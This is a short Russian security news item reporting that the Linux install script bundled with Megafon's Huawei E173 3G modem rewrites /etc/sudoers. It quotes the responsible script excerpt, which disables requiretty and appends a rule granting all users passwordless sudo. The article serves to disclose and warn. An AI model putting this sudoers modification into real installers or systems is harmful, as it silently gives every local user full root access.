Драйверы для 3G modem создают угрозу безопасности

image

Теги: исследование

При установке драйверов для Megafon 3G modem на операционной системе linux происходит модификация файла sudoers.

В блоге  habrahabr.ru  Антон Лисицин сообщил об инциденте связанном с драйверами для 3G модема «Huawei» от Megafon. Согласно его сообщению, при установке, идущего в комплекте с устройством, программного обеспечения происходит модификация файла sudoers. В следствии изменения этого файла повышаются привилегии всех пользователей на системе.  

«Купил модем E173, на встроенной памяти скрипт установки, требует права рута. Совершил ошибку, дал молча права. Позже вижу, что команда sudo не требует пароля», - сообщил автор.  

Независимый исследователь проанализировал скрипт установки и обнаружил ту его часть, которая стала причиной модификации:  

grep -v «MobilePartner.sh» /etc/sudoers >/tmp/${TEMPFILE} 2>&1
 DELETECOMMENT=«delete requiretty for hw_mobile»
 REQUIRETTY=`grep "${DELETECOMMENT}" /tmp/${TEMPFILE}`
 if [ «x${REQUIRETTY}» != «x» ]
 then
 REQUIRETTY=`echo "${REQUIRETTY}" | awk -F ',' '{printf $2}'`
 else
 REQUIRETTY=`grep «requiretty» /tmp/${TEMPFILE}`
 if [ «x${REQUIRETTY}» != «x» ]
 then
 sed -i «s/${REQUIRETTY}/# ,${REQUIRETTY},${DELETECOMMENT}/g» /tmp/${TEMPFILE} 2>/dev/null
 fi
 fi# Shashank: Defect fix AJ2D13470: Begin
 echo -e «ALL ALL=(ALL) NOPASSWD:ALL» >> /tmp/${TEMPFILE}  
 

В настоящий момент неизвестно, содержит ли данное программное обеспечение какой-либо вредоносный код. 

Telegram Подписывайтесь на канал "SecurityLab" в Telegram, чтобы первыми узнавать о новостях и эксклюзивных материалах по информационной безопасности.

comments powered by Disqus